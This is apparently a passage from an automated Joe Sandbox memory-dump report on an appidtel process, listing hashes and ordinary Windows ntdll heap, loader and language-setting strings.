                                          • Opcode Fuzzy Hash: 950995f0e20f47d956ded32ef084c7a0cdb642df269c474cc436a6f4c08eaf2b
                                          • Instruction Fuzzy Hash: 77129934600642DFD725CF28C4A5BBBBBF5EF09614F18845AE4968F742D734E881CBA8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                          • API String ID: 0-3532704233
                                          • Opcode ID: d12e01512432f975c7f4c167b4b83dcf6ace6c0b10e7611072ef81eed6e50866
                                          • Instruction ID: 6c537c1cacece7c7e3a81a5378db0553ed48e0fbcae9461142950b188ec27858
                                          • Opcode Fuzzy Hash: d12e01512432f975c7f4c167b4b83dcf6ace6c0b10e7611072ef81eed6e50866
                                          • Instruction Fuzzy Hash: 14B1BE729083559FC721DF24C884A6BB7E8BF88754F85092EFA89DB204D730D948CB96
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                          • API String ID: 0-3063724069
                                          • Opcode ID: 3e340127a8bae98e0f2981659306229414cd43cfc7dde62b261f63b48a4df6db
                                          • Instruction ID: 5de98e017e372429ecb22dfc752ab1158d16ecc4016a64784aeb5f3670b8d4c9
                                          • Opcode Fuzzy Hash: 3e340127a8bae98e0f2981659306229414cd43cfc7dde62b261f63b48a4df6db
                                          • Instruction Fuzzy Hash: 91D1E572808315AFEB21DA54C841B6FFBE8AF88714F44492FFA94AF250D770DD44879A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                          • API String ID: 0-1700792311
                                          • Opcode ID: 792c6fae9cebd40980f6afa60a1b4cfad949f62fc81b3fb51389e77ed29e4ab2
                                          • Instruction ID: 84ca8d9f393cfbaaf8c83397ce66930cbd80efbe92b34e6d99ed8565818d96b9
                                          • Opcode Fuzzy Hash: 792c6fae9cebd40980f6afa60a1b4cfad949f62fc81b3fb51389e77ed29e4ab2
                                          • Instruction Fuzzy Hash: 49D1AA399006859FCB16EF68C480AAFFBF1FF4A611F08805AE555AF762C7349941CB28
                                          Strings
                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 033FD2C3
                                          • @, xrefs: 033FD0FD
                                          • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 033FD0CF
                                          • @, xrefs: 033FD313
                                          • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 033FD146
                                          • Control Panel\Desktop\LanguageConfiguration, xrefs: 033FD196
                                          • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 033FD262
                                          • @, xrefs: 033FD2AF
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                          • API String ID: 0-1356375266
                                          • Opcode ID: a6778012080681c6f0362833d9f90d96907d574e5595c782b73e700384c3182f
                                          • Instruction ID: 9024abc42771e8d0e503584e7b3ba39d8f1c4902c4c921e81d10b0130831379c
                                          • Opcode Fuzzy Hash: a6778012080681c6f0362833d9f90d96907d574e5595c782b73e700384c3182f
                                          • Instruction Fuzzy Hash: 32A19B719083459FE721DF21C888B5BF7E8BB84715F404E2EFA889A241D774D908CB97
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-523794902
                                          • Opcode ID: 09b9e3f11b01bec33a29cf53da83ff810f10c383b5f008463d611bb10d3b34d1
                                          • Instruction ID: 5fe064484d017063d1dad5f51ef06ce1309642616ba50d8b85e499cec70e590a
                                          • Opcode Fuzzy Hash: 09b9e3f11b01bec33a29cf53da83ff810f10c383b5f008463d611bb10d3b34d1
                                          • Instruction Fuzzy Hash: 7542DD39A087819FC314DF28C880A6ABBE9EF84604F48496EF995CF352D734D985CB56
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                          • API String ID: 0-122214566
                                          • Opcode ID: eca6b5b5262472df920ffce63a55c6d8cfe5c1e73e738a511ecef1d4448c38a9
                                          • Instruction ID: fa19c5a52d82e5ea271ca544c53d2fe0beb106caa356c60233978f5412dda549
                                          • Opcode Fuzzy Hash: eca6b5b5262472df920ffce63a55c6d8cfe5c1e73e738a511ecef1d4448c38a9
                                          • Instruction Fuzzy Hash: 59C12831A00619AFDB24DF65C880BBFF7A5EF45300F18816BE8569F381E7B48965C399
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-792281065
                                          • Opcode ID: 43d57ca9f182524c4afccd992a70a64c46e8c8570c6b9f7b7e8508a9f7cd9cc0
                                          • Instruction ID: 2446bf26d3ff1f809a44a73ffa98a8549003cb82d789508bda7d9431df9cc81d
                                          • Opcode Fuzzy Hash: 43d57ca9f182524c4afccd992a70a64c46e8c8570c6b9f7b7e8508a9f7cd9cc0
                                          • Instruction Fuzzy Hash: 0F910234A01311AFDB24EF16E884BAE77A4EB06B54F09416BE9207F381D7789851CB9D
                                          Strings
                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 03472178
                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 03472180
                                          • RtlGetAssemblyStorageRoot, xrefs: 03472160, 0347219A, 034721BA
                                          • SXS: %s() passed the empty activation context, xrefs: 03472165
                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0347219F
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 034721BF
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                          • API String ID: 0-861424205
                                          • Opcode ID: 57651cb7e500195e86485e93a8397b9c267d0ceee68d12dfa3765014b79d6b70
                                          • Instruction ID: d4ffc35427fb34bdb0a0202826005cfc2c209636486537a73338bad326ec63e9
                                          • Opcode Fuzzy Hash: 57651cb7e500195e86485e93a8397b9c267d0ceee68d12dfa3765014b79d6b70
                                          • Instruction Fuzzy Hash: D131D236F403247BE721DA95DC81F9FB778EB59A90F09046AFA14AF341D2B09A0186A5
                                          Strings
                                          • Kernel-MUI-Language-Allowed, xrefs: 0342527B
                                          • Kernel-MUI-Language-Disallowed, xrefs: 03425352
                                          • Kernel-MUI-Number-Allowed, xrefs: 03425247
                                          • Kernel-MUI-Language-SKU, xrefs: 0342542B
                                          • WindowsExcludedProcs, xrefs: 0342522A
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 0-258546922
                                          • Opcode ID: cc06e5e1e11396d91f6d43064a3da746e334a685be8df01e786e771228b33290
                                          • Instruction ID: de43b07b6c7fa33d917eba838157e26d965178f081342a0b90385229601211ad
                                          • Opcode Fuzzy Hash: cc06e5e1e11396d91f6d43064a3da746e334a685be8df01e786e771228b33290
                                          • Instruction Fuzzy Hash: A6F13C76D10628EFDB11DF95C980AAEFBB9EF49650F5500ABE501FF210EB709E018B94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1975516107
                                          • Opcode ID: a2c8b4ee6a2ef277fd8867b472435c95419252d600dd3be77e80e3c528609f41
                                          • Instruction ID: 7f7ab50ebf5ab3b4079ac87a1e1b955673ce128a450ff152ee81f974d3e97f8e
                                          • Opcode Fuzzy Hash: a2c8b4ee6a2ef277fd8867b472435c95419252d600dd3be77e80e3c528609f41
                                          • Instruction Fuzzy Hash: E151EB75E003558FDB14EFA5D4847AEBBB1FF4A304F68419AD821BF291C770A855CB88
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                          • API String ID: 0-3061284088
                                          • Opcode ID: ba9416c8a75b9e386e64b9fd93469a6ae617d8fec154fcfae47e8f66877ac2a0
                                          • Instruction ID: b0a05452a7b80cd2ca5d89a2d4e0e11dbc0ff94d1cfa913b85f7611c4803ca7c
                                          • Opcode Fuzzy Hash: ba9416c8a75b9e386e64b9fd93469a6ae617d8fec154fcfae47e8f66877ac2a0
                                          • Instruction Fuzzy Hash: 1A01D877918350DFD225E718F48AF67F7D4DB42E30F28405AF5108F6A2CAA49884C164
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                          • API String ID: 0-3178619729
                                          • Opcode ID: 3ac5367eb9d019516b85bb6cb1358691292e3c948dfcbdd6afc835e1ddef4627
                                          • Instruction ID: b9753eac6d0806084fc29df435e5f6bd206357903ee3e63ac471302f2dee3d87
                                          • Opcode Fuzzy Hash: 3ac5367eb9d019516b85bb6cb1358691292e3c948dfcbdd6afc835e1ddef4627
                                          • Instruction Fuzzy Hash: 7313AF74A00A558FDB25CF68C4807AAFBF1FF49304F18819AD859AF381D734A956CF98
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-3570731704
                                          • Opcode ID: b3f258a6d7056219f2c1a545e19a699ad7b95624a7e969d6f4617af1209c4425
                                          • Instruction ID: 7edec6d3a0d098472ad5d1a4f81264281b2a426d37d79f431543ec62bdd627f9
                                          • Opcode Fuzzy Hash: b3f258a6d7056219f2c1a545e19a699ad7b95624a7e969d6f4617af1209c4425
                                          • Instruction Fuzzy Hash: FC926975A00628CFEB24CF19CC40BAAB7B5BF45310F0981EAD949AB390D7709E91CF59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                          • API String ID: 0-379654539
                                          • Opcode ID: 192b9010ad4a20b07993ca30d70f17c5a8123ede423068a01d6e550d6595cb05
                                          • Instruction ID: a0f221f610d6bcb9f07f163cc433dc74eabd8722951b573e7e04027a4134244c
                                          • Opcode Fuzzy Hash: 192b9010ad4a20b07993ca30d70f17c5a8123ede423068a01d6e550d6595cb05
                                          • Instruction Fuzzy Hash: 56C178792083829FD711DF68C144B6AB7F4BF84704F04896AF8A58F391E774C94ACB5A
                                          Strings
                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 034721D9, 034722B1
                                          • .Local, xrefs: 034328D8
                                          • SXS: %s() passed the empty activation context, xrefs: 034721DE
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 034722B6
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                          • API String ID: 0-1239276146
                                          • Opcode ID: 70766c5e3c9a379fff97f0204b9cbc42185acc4aeb6460cd9cd29d7f2cd54be0
                                          • Instruction ID: cc4095f0539445b938d193582adece7a62d88e440efc11450c9218a97ad9b60d
                                          • Opcode Fuzzy Hash: 70766c5e3c9a379fff97f0204b9cbc42185acc4aeb6460cd9cd29d7f2cd54be0
                                          • Instruction Fuzzy Hash: 79A19135A00229DFCB24CF54D884B9AB3B5BF59314F1945EAD818AF351D7709E81CF98
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                          • API String ID: 0-2586055223
                                          • Opcode ID: ff5942775785c35ca6a5009809e1cd7839cef90faea75f6e0cf1b8d06a097668
                                          • Instruction ID: 2b803cae6a374e0a6b524aa07086a41b30c467cf240826021fb8c199ab862503
                                          • Opcode Fuzzy Hash: ff5942775785c35ca6a5009809e1cd7839cef90faea75f6e0cf1b8d06a097668
                                          • Instruction Fuzzy Hash: B361E176604780AFE311DE24C884BABB7E9EF84714F08046AFE558F392DB34D945CB65
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                          • API String ID: 0-336120773
                                          • Opcode ID: f5aaade1d1836f686e28041ed8effe006687b1db521d74eac993d9750d1f0a42
                                          • Instruction ID: 42e4de746993e81f26e40395b2d20458d5c72071c1fe196f678e0d154e7b9192
                                          • Opcode Fuzzy Hash: f5aaade1d1836f686e28041ed8effe006687b1db521d74eac993d9750d1f0a42
                                          • Instruction Fuzzy Hash: AA31E136600200EFE714DB98D8D5FABB3F9EF09A60F280556F591EF291D770AC40CA69
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                          • API String ID: 0-1391187441
                                          • Opcode ID: 24f42db208d5c7e1c17bb07d2c3c90d3c1792b773b6f368787e9d6e55627d960
                                          • Instruction ID: 5271e8cfe3f3b51e96c042e58b80a7af9bc87b838ec3ec9e45ef50b8b90a1efc
                                          • Opcode Fuzzy Hash: 24f42db208d5c7e1c17bb07d2c3c90d3c1792b773b6f368787e9d6e55627d960
                                          • Instruction Fuzzy Hash: 66318036A00214AFDB11DB55CCC5FAEB7B8EF45620F544066F924AB292D770ED40CA64
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-4253913091
                                          • Opcode ID: da179b163fa7c1777fedc51b64d8c920cd493dfbcbe4f9569077e5e2aafe2799
                                          • Instruction ID: cfb3a69ff0bcc21ed396a065ca1e13695ae59cd3b2c6124d7dc3518087ef94b8
                                          • Opcode Fuzzy Hash: da179b163fa7c1777fedc51b64d8c920cd493dfbcbe4f9569077e5e2aafe2799
                                          • Instruction Fuzzy Hash: E8F19934A00A05DFEB14CF69C894BAAB7B5FF45304F1881AAE4169F381D734E991CF99
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                          • API String ID: 0-1145731471
                                          • Opcode ID: 6677b408be67491f247474836693d26687c142af3c1de332847f3b8df097a03f
                                          • Instruction ID: bcb294a78ac6672fa03aa5249ed75a59d0d40890c790ddbc69321e73b1ee78d4
                                          • Opcode Fuzzy Hash: 6677b408be67491f247474836693d26687c142af3c1de332847f3b8df097a03f
                                          • Instruction Fuzzy Hash: B9B18D3AA146448FDB25CF69C980BAEB7F6EF44714F18442AE851EF3A0D730E841CB59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: FilterFullPath$UseFilter$\??\
                                          • API String ID: 0-2779062949
                                          • Opcode ID: 430df59d3266b8edcc2a8725d20cb7c60dc3a6092b398c8eb7c3eb71f55a5dd4
                                          • Instruction ID: 9d92b68bea53d65458b6f655c9cfcd18fb036f4f739c3b85c2736c4895241b11
                                          • Opcode Fuzzy Hash: 430df59d3266b8edcc2a8725d20cb7c60dc3a6092b398c8eb7c3eb71f55a5dd4
                                          • Instruction Fuzzy Hash: B4A15875D016299FDB21DF24CCC8BAAB7B8EF44700F1401EAE909AB251E7759E84CF54
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                          • API String ID: 0-318774311
                                          • Opcode ID: acb7af18703c857f5c9c45401f398d18452d7ed8505856b68dc1313c364da7ed
                                          • Instruction ID: 57a482b9212cc66f76ab49b5a81b66b016ffdd4b0686b2db2141b27f13eab1bf
                                          • Opcode Fuzzy Hash: acb7af18703c857f5c9c45401f398d18452d7ed8505856b68dc1313c364da7ed
                                          • Instruction Fuzzy Hash: E2819C79608340AFEB11DF15C844B6BBBE8AB86750F04496FF9909F390D774D9048B6A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %$&$@
                                          • API String ID: 0-1537733988
                                          • Opcode ID: 7970899a9852fee9edf2913cb8a983ae3c2d14bdf765d390654d56a19f19d104
                                          • Instruction ID: bede083d17cd1195d0c59d01fad0520366d43b445e44aad4ded7876a72311873
                                          • Opcode Fuzzy Hash: 7970899a9852fee9edf2913cb8a983ae3c2d14bdf765d390654d56a19f19d104
                                          • Instruction Fuzzy Hash: A171BD706087019FD750DF25C580B6BBBE9BF8A618F14895FE4A69F340C7B0D806CB9A
                                          Strings
                                          • TargetNtPath, xrefs: 034DB82F
                                          • GlobalizationUserSettings, xrefs: 034DB834
                                          • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 034DB82A
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                          • API String ID: 0-505981995
                                          • Opcode ID: ff05d39d5bb55940ec0dbeebb0d7e3c51d87e4cb522a4d5d166641635d656742
                                          • Instruction ID: 94e78180123d295e4606e6c07a79ae732653215cb6cff8c2c99c80b053c03f4c
                                          • Opcode Fuzzy Hash: ff05d39d5bb55940ec0dbeebb0d7e3c51d87e4cb522a4d5d166641635d656742
                                          • Instruction Fuzzy Hash: E7618176941229AFDB21DF55DC98BDAB7B8EB04710F0201EAE509AF350D7749E80CF98
                                          Strings
                                          • HEAP: , xrefs: 0345E6B3
                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0345E6C6
                                          • HEAP[%wZ]: , xrefs: 0345E6A6
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                          • API String ID: 0-1340214556
                                          • Opcode ID: 5feebca99d792c23a1b557ef387d6263ce9575a7df388d9a146b3410becda209
                                          • Instruction ID: a2f9ce5dfec49c66e02bf4bbc64ee5fc6aea493f0aba28438c0384455bae0710
                                          • Opcode Fuzzy Hash: 5feebca99d792c23a1b557ef387d6263ce9575a7df388d9a146b3410becda209
                                          • Instruction Fuzzy Hash: 8151F775604B44EFE722DBA8C984F96BBF8EF05700F4800A6EA518F792D774EA50CB14
                                          Strings
                                          • minkernel\ntdll\ldrinit.c, xrefs: 034782E8
                                          • Failed to reallocate the system dirs string !, xrefs: 034782D7
                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 034782DE
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1783798831
                                          • Opcode ID: 45866915406e72b7794674f746ef1a2416f99a61708f6a98e467bb23bd44a382
                                          • Instruction ID: 9f8a0aa93e8a3cce6b4a5d42ece37b4e2a080dee095e01f474b9a5188d9a4cfa
                                          • Opcode Fuzzy Hash: 45866915406e72b7794674f746ef1a2416f99a61708f6a98e467bb23bd44a382
                                          • Instruction Fuzzy Hash: 554132B6500301AFD720FB64D885B5B77E8EF49650F09482BF958EF290EB74D810CB99
                                          Strings
                                          • LdrpAllocateTls, xrefs: 03471B40
                                          • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 03471B39
                                          • minkernel\ntdll\ldrtls.c, xrefs: 03471B4A
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_33d0000_appidtel.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                          • API String ID: 0-4274184382
                                          • Opcode ID: 856e234c779e4d07221841ad759699209ea7b8b8fb8187b532634de57ea88cbe
                                          • Instruction ID: 0dbc4ae44007c256c15a6c0c7e0c3bc119d5b65ce143e0ee24ef88cdbee9bed4
                                          • Opcode Fuzzy Hash: 856e234c779e4d07221841ad759699209ea7b8b8fb8187b532634de57ea88cbe
                                          • Instruction Fuzzy Hash: 27417C79A00604AFDB15DFA9C881BAEFBF5FF49714F18416AE405AF340D775A800CB98
                                          Strings
                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 034BC1C5
                                          • PreferredUILanguages, xrefs: 034BC212
                                          • @, xrefs: 034BC1F1
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
